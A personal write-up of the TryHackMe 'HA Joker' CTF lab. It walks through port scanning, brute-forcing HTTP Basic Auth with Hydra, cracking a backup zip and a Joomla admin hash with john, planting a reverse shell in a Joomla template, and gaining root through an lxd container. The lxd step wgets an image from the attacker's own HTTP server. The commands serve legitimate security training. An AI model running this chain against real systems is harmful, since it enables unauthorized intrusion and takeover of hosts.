HA Joker CTF — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my HA Joker CTF — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -A -p- -T4 -v <ip>
So there are 3 ports opened.
The version of Apache is 2.4.29. Because port 8080 returns 403 code, so only port 80 can be accessed without authenticating.
Next, I’ll find hidden dirs and files using gobuster.
gobuster dir -u http://<ip>:80/ -w /path-to-wordlist -x php,txt,html 2>/dev/null
So, the secret file is secret.txt. And the file which reveals information of the backend is phpinfo.php.
Let’s see the content of secret.txt:
So, the user for the next question is joker.
Next, the port on this machine need to be authenticated by Basic Authentication Mechanism is 8080 (as it returns code 403 when nmap).
I’ll use Hydra to bruteforce the password.
hydra -l joker -P rockyou.txt <ip> -s 8080 http-get /
After a while I’ve got the correct password. Login to the website under port 8080:
It’s a Joomla! CMS website:
Next, I will use nikto to check for files and dirs:
nikto -h http://<ip>:8080/ -id joker:<password>
So, /administrator is the admin directory.
The backup file’s name is backup.zip. Download it to your machine and use john to crack the zip’s password. First, use zip2john to change the zip format to the format john can understand:
zip2john backup.zip > zip.txt
Then, crack the password using this file:
john — wordlist=rockyou.txt zip.txt
After a while I’ve got the zip’s password:
Extract this zip using the password.
unzip backup.zip
Enter the password and it’ll be extracted to 2 folders: db and site
Inside db is a .sql file. Read content of this file and you’ll find the super duper user as well as his password’s hash.
Next, I’ll crack the hash password using john. Copy the hash to a text file (mine is duper.txt) and:
john — wordlist=rockyou.txt duper.txt
After a while I’ve got the admin password:
Use the credential admin and this password to login to http://<ip>:8080/administrator.
Next, navigate to templates:
Click on the 1st template:
Edit the file “index.php” to spawn a reverse shell:
Save it. Start a listener on your machine:
nc -lvnp <port>
Then click “ Template Preview” from your browser:
And you will get the shell into the machine!
So now, the owner of this session is www-data. The special group that this user belongs to is lxd.
You can spawn a tty shell using python:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Next, I will use lxd to own root.
From your machine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
After the build has completed, a .tar.gz file will be created:
Now transfer this .tar.gz file into the target machine.
First, start a http server from your machine:
python -m http.server 9000
or python2:
python -m SimpleHTTPServer 9000
Then, from the target machine:
wget <your-VPN-ip>:9000/alpine….tar.gz
As you can see, the file has been transferred successfully.
Now, import the image:
lxc image import ./alpine….tar.gz
You can check if the image has been imported using this cmd:
lxc image list
The alpine images has been imported. You can add an Alias to your alpine image using this cmd:
lxc image alias create shell <fingerprint>
As you can see, I’ve added the name “shell” to my alpine image.
Then, follow these commands to own root:
lxc init <your-image-alias> ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
As you can see, I’ve spawned a shell as root! Get the final flag in /mnt/root/root:
The end.
HAPPY HACKING
